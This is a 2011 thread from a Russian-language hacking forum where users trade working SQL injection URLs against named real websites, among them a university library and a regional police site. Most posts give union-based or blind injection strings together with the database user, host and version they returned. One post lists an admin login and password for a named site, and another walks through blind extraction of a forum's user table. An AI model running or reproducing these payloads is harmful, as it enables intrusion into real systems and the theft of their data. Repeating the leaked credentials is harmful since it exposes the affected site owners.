ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
11.10.2011, 01:24
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
insanely-great.com PR-5
Код:
Code:
www.insanely-great.com/news.php?id=-11189+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
Код:
Code:
5.0.77-log:flamini_flaminio@216.14.208.109:flamini_igm
innovid.com PR-5
Код:
Code:
http://www.innovid.com/news.php?itemID=52+and+5=substring((SELECT+version()),1,1)+--+
library.uni-altai.ru ТИЦ-180
Код:
Code:
library.uni-altai.ru/FullNews/shownew.php?num=-1253+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11+--+
Код:
Code:
5.1.49-3-log:serg@localhost:libnews
|
|
|
11.10.2011, 09:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
1030
Репутация:
0
|
|
Код:
Code:
http://www.nov-mvd.ru/GUVDpoNSO/Statistika?blogs2_id=552+limit+0+union+select+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,4,5,6
Web Server: Apache/2.0.63-lk.d (Unix) mod_ssl/2.0.63-lk.d OpenSSL/0.9.8g mod_dp20/0.99.2 mod_python/3.3.1 Python/2.5.1 mod_ruby/1.2.6 Ruby/1.8.6(2007-09-24)
DB Server: MySQL
Current DB: notixshoru_mvd |
|
|
|
11.10.2011, 15:47
|
|
Новичок
Регистрация: 04.10.2009
Сообщений: 10
Провел на форуме:
58602
Репутация:
1
|
|
Код:
Code:
http://www.zebra.nsk.ru/index.php?page=lotinfo&id=-9277+union+select+1,2,concat_ws(0x3a3a3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+--+
zebransk_base@localhost:::5.1.50-rel11.4-log:::zebra777_base |
|
|
|
11.10.2011, 16:34
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
тиЦ 800 PR 5
Сообщение от None
http://vkirove.ru/catalog/index/?oid=-53%27%20UNION%20SELECT%201,2,CONCAT_ws%280x3a,user %28%29,version%28%29,database%28%29%29,4,5+--+
vns@localhost:5.1.53-log:www
тиЦ 160 PR 4
Сообщение от None
http://www.printmagazine.ru/market.php?id=-39+union+select+concat_ws%280x3a,user%28%29,databa se%28%29,version%28%29%29,2,3+--+
printmag@localhost:wwwprintmagazinr:4.1.25-log
тиЦ 30 PR 3
Сообщение от None
http://www.nostratic.ru/index.php?page=9999999+union+select+1,2,3,concat_w s%280x3a,user%28%29,version%28%29,database%28%29%2 9,5,6,7+--+
200148610@localhost:4.1.25-log:db00148610
тиЦ 30 PR 3
Сообщение от None
http://www.feromon.ru/?fm=0&categoryID=111%20and%200%20union%20select%20 1,concat_ws%280x3a,user%28%29,version%28%29,databa se%28%29%29,3+--+
u25499@10.8.0.155:5.0.90-log:u25499
|
|
|
|
11.10.2011, 16:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
не знаю куда постить админки и запостил тут!
Код:
Code:
http://www.konkir.ru/
модеры если у меня глаза не видят то сорри,перенесите туда где должно быть!
root:market2004 |
|
|
|
12.10.2011, 17:34
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
тиЦ 1000 PR 4
Сообщение от None
http://maxybaby.net.ua/index.php?loc=detskie-stihi-i-pesenki&stih=120%20and%201=0%20union%20select%201, 2,3,4,5,concat_ws%280x3a,user%28%29,database%28%29 ,version%28%29%29+--+
maxybaby_root@localhost:maxybaby_maximka:5.0.51a-24+lenny5 "4"
|
|
|
|
12.10.2011, 17:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
4100
Репутация:
74
|
|
Равнодушным к РУ-АвтоПрому посвящается...
www.la[g]da.ru
PR/TYC = 6/1700
DB: Oracle
Базы
Код:
Code:
http://www.la[g]da.ru/carco[g]lors.php?ba[g]se_id=6295171 AND ASCII(SUBSTR((SELECT NVL(CAST(COUNT(DISTINCT(OWNER)) AS VARC[g]HAR(4000)),CHR(32)) FROM SYS.ALL_TABLES),1,1)) > 51
Таблицы
Код:
Code:
http://www.la[g]da.ru/ca[g]rcolors.php?ba[g]se_id=6295171 AND ASCII(SUBS[g]TR((SELECT NVL(CAST(TABLE_NAME AS VARCHAR(4000)),CHR(32)) FRO[g]M (SELECT TABLE_NAME,ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE OWNER=CHR(68)||CHR(83)||CHR(79)) WHERE LIMIT=4),6,1)) = 68
Колонки
Код:
Code:
http://www.la[g]da.ru/carco[g]lors.php?ba[g]se_id=6295171 AND ASCII(SUBSTR((SEL[g]ECT NVL(CAST(COUNT(COLUMN_NAME) AS VARCHAR(4000)),CHR(32)) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=CHR(68)||CHR(90)||CHR(79)||CHR(95)||CHR(85)||CHR(83)||CHR(69)||CHR(82)),1,1)) > 48
[PHP]
PHP:
[COLOR="#000000"] databases[9]:
CTXSYS
DSO[COLOR="#007700"]
|
|
|
|
13.10.2011, 01:55
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
willkommen-tv.at PR-5
Код:
Code:
http://www.willkommen-tv.at/artikel.php?id=8+and+1=2+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9+--+
Код:
Code:
4.0.27inode:wi000142_0001@nat.ubh.inode.at:wi000142_0001
netporn.nl alexa-34k
Код:
Code:
http://www.netporn.nl/uprofile.php?UID=70796+and+5=substring((SELECT+version()),1,1)
surfbirds.com PR-5
Код:
Code:
http://surfbirds.com/video2/uprofile.php?UID=1045+UnIon+selECt+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+--+
Код:
Code:
5.0.83-rs-log:surfbirds_vshare@localhost:surfbirds_videoshare
|
|
|
|
13.10.2011, 08:36
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от OxoTnik
OxoTnik said:
когда лезешь дальше, сайт отвергает мой запросы
Но там есть форум phpBB, тоесть можно просто на угад вытащить типа
Код:
Code:
http://www.ma3da.ru/news.php?news_id=-862+union+select+1,2,concat_ws%280x3a,user_id,user _password, username%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16 +from+phpbb_users--
Сорри за небольшой флуд, НО...
Уважаемый, на каких предположениях Вы говорите, что там есть вышесцитированная таблица, если вам режет все запросы хостер ? Пальцем в небо ??
В случае, когда хостер блокирует запросы, нам ничего не мешает применять метод слепой инъекции и орудовать полученными данными.
Нет там никакой таблички phpbb_users, зато есть forum_users
Даже скажу больше - в табличке forum_users аж 10690 записей.
Судите сами
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.ma3da.ru/news.php?news_id=999999.9+or+ascii(substring((SELECT+count(*)+FROM+ma3daru.forum_users),1,1))=49
[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.ma3da.ru/news.php?news_id=999999.9+or+ascii(substring((SELECT+count(*)+FROM+ma3daru.forum_users),2,1))=48
[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.ma3da.ru/news.php?news_id=99999+or+ascii(substring((SELECT+count(*)+FROM+ma3daru.forum_users),3,1))=54
[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.ma3da.ru/news.php?news_id=99999+or+ascii(substring((SELECT+count(*)+FROM+ma3daru.forum_users),4,1))=57
[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.ma3da.ru/news.php?news_id=99999+or+ascii(substring((SELECT+count(*)+FROM+ma3daru.forum_users),5,1))=48[/COLOR][/COLOR]
|
|
|
|
13.10.2011, 16:18
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
тиЦ 650 PR 5
Код:
Code:
http://zvezda.ru/news_read.php?id=-9999999/**/union/**/select/**/concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,2,3,4,5,6,7,8,9+--+
antares_user@localhost:antares_DB:5.0.92-community
Код:
Code:
http://zvezda.ru/news_read.php?id=-9999999/**/union/**/select/**/group_concat%28table_name%29,2,3,4,5,6,7,8,9/**/from/**/information_schema.tables+--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для Ksi[O]n](/avatars/avatar.jpg?2859518){kind=avatar}
Линейный вид
